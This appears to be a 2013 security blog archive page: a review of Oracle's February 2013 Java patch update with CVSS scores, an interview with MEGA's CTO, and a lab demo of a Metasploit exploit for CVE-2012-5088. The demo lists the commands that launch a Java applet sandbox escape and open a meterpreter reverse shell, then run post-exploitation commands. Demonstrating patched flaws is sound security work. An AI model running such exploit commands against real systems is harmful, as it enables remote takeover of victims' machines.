Yearly Archives: 2013

Oracle Java Critical Patch Update February 2013 Review

Vulnerability Management, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,

Oracle has provide his Java Critical Patch Update (CPU) for February 2013 how has been released on Friday, February 1. Initial release date was planned for 19 February but Oracle has push this update earlier due to the active exploitation of one of the critical vulnerabilities in the wild. On the 50 security vulnerabilities, fixed in this CPU, 49 of them may be remotely exploitable. The highest CVSS Base Score for vulnerabilities in this CPU is 10.0. 34 vulnerabilities have a CVSS base score upper or equal to 7.0.

It is actually not clear which of these vulnerability is exploited in the wild, but it could be related to CVE-2013-1489, an issue publicly reported and regarding Java SE7 security features introduced in Java SE7 Update 10.

As you may know Oracle is using CVSS 2.0 (Common Vulnerability Scoring System) in order to score the reported vulnerabilities. But as you also may know security researchers disagree with the usage of CVSS by Oracle. Oracle play with CVSS score by creating a “Partial+” impact rating how don’t exist in CVSS 2.0, and by interpreting the “Complete” rating in a different way than defined in CVSS 2.0.

Affected products are:

  • JDK and JRE 7 Update 11 and earlier
  • JDK and JRE 6 Update 38 and earlier
  • JDK and JRE 5.0 Update 38 and earlier
  • SDK and JRE 1.4.2_40 and earlier
  • JavaFX 2.2.4 and earlier

CVE-2012-1541CVE-2012-3213CVE-2012-3342CVE-2012-4301CVE-2013-0425CVE-2013-0426CVE-2013-0428CVE-2013-0436CVE-2013-0437CVE-2013-0439CVE-2013-0441CVE-2013-0442CVE-2013-0445CVE-2013-0446CVE-2013-0447CVE-2013-0450CVE-2013-1472CVE-2013-1475CVE-2013-1476CVE-2013-1477CVE-2013-1478CVE-2013-1479CVE-2013-1480CVE-2013-1481CVE-2013-1482 and CVE-2013-1483 have a CVSS base score of 10.0.

CVE-2012-4305 and CVE-2013-1474 have a CVSS base score of 9.3.

CVE-2012-1543, CVE-2013-0419, CVE-2013-0423, CVE-2013-0429 and CVE-2013-0444 have a CVSS base score of 7.6.

CVE-2013-0351 has a CVSS base score of 7.5.

CVE-2013-0430 has a CVSS base score of 6.9.

CVE-2013-0432 has a CVSS base score of 6.4.

CVE-2013-0409, CVE-2013-0424, CVE-2013-0427, CVE-2013-0431, CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0440, CVE-2013-0448, CVE-2013-0449 and CVE-2013-1473 have a CVSS base score of 5.0.

CVE-2013-0438 has a CVSS base score of 4.3.

CVE-2013-0443 has a CVSS base score of 4.0.

CVE-2013-1489 has a CVSS base score of 0.0.

Interview of Mathias Ortmann MEGA CTO

Various, ,

I had the chance to interview Mathias Ortmann, co-founder and Chief Technology Officer (CTO) of MEGA, through Xavier Buck a Luxembourgish entrepreneur. Mathias Ortmann review the launch of MEGA, the secured Cloud based file sharing plate-forme.

170322703851009d6a62f78

How did you start MEGA adventure?

When we learned that our extradition proceedings would be delayed by the US government appealing against the high court’s decision that we are allowed to see evidence, we knew that we would be in for a long and costly legal battle. The only way to finance it is to make money, and since we have some expertise in the field of cloud storage, we decided to go down that path.

MEGA buz has generate a lot of cyber attacks, you excepted it?

Cyber attacks in the sense of denial-of-service or hacking attempts – not yet.
Cyber attacks in the sense of massive user demand – oh yes!

What do you think regarding the encryption polemic?

We are a bit disappointed by statements like “If you can break SSL, you can break MEGA” and the uninformed discussion about our de-duplication strategy. However, there is also a positive side – so far, two genuine vulnerabilities have been found, reported to us and fixed: A crypto-unrelated XSS issue and a basic design flaw in our static content verification process. We are still undecided on the issue of whether we should protect users that choose unsafe passwords or rather educate them better so that they don’t.

You host some servers in USA, should you worry?

Despite the WHOIS result, we have no serves in the US (or Africa).

MEGA propose a secured cloud storage as a service. What counter measure are in place in order to protect copyrights?

Copyrights are not affected by encryption. Whether or not the data is encrypted, policing all user files for copyrighted content is neither required nor permitted, and we enforce a takedown policy that complies with all applicable laws and works just fine despite the encryption.

Why is MEGA the best?

Are we the best? We leave that up to the market to decide. We believe that our product – the combination of privacy, convenience, performance and pricing – is an attractive one, and we hope that it will be accepted and become popular despite our legal fight and the negative crypto-related PR that erupted immediately after our launch. To use the weather as an analogy (MEGA vs. the market leaders): We believe that a few dissipating clouds in a blue sky are still better than standing in the rain all the time!

CVE-2012-5088 Java Applet Method Handle RCE Metasploit Demo

Exploits, Metasploit, , , ,

Timeline :

Vulnerability patched by Oracle in 2012 October CPU
Metasploit PoC provided the 2013-01-22

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2012-5088
OSVDB-86352
BID-56057
Oracle October 2012 CPU
New Java Modules in Metasploit… No 0 days this time

Affected version(s) :

Oracle Java version 7 Update 7 and earlier.

Tested on Windows 8 Pro with :

Internet Explorer 10
Oracle Java 7 Update 7

Description :

This module abuses the Method Handle class from a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects Java version 7u7 and earlier.

Commands :

use exploit/multi/browser/java_jre17_method_handle
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo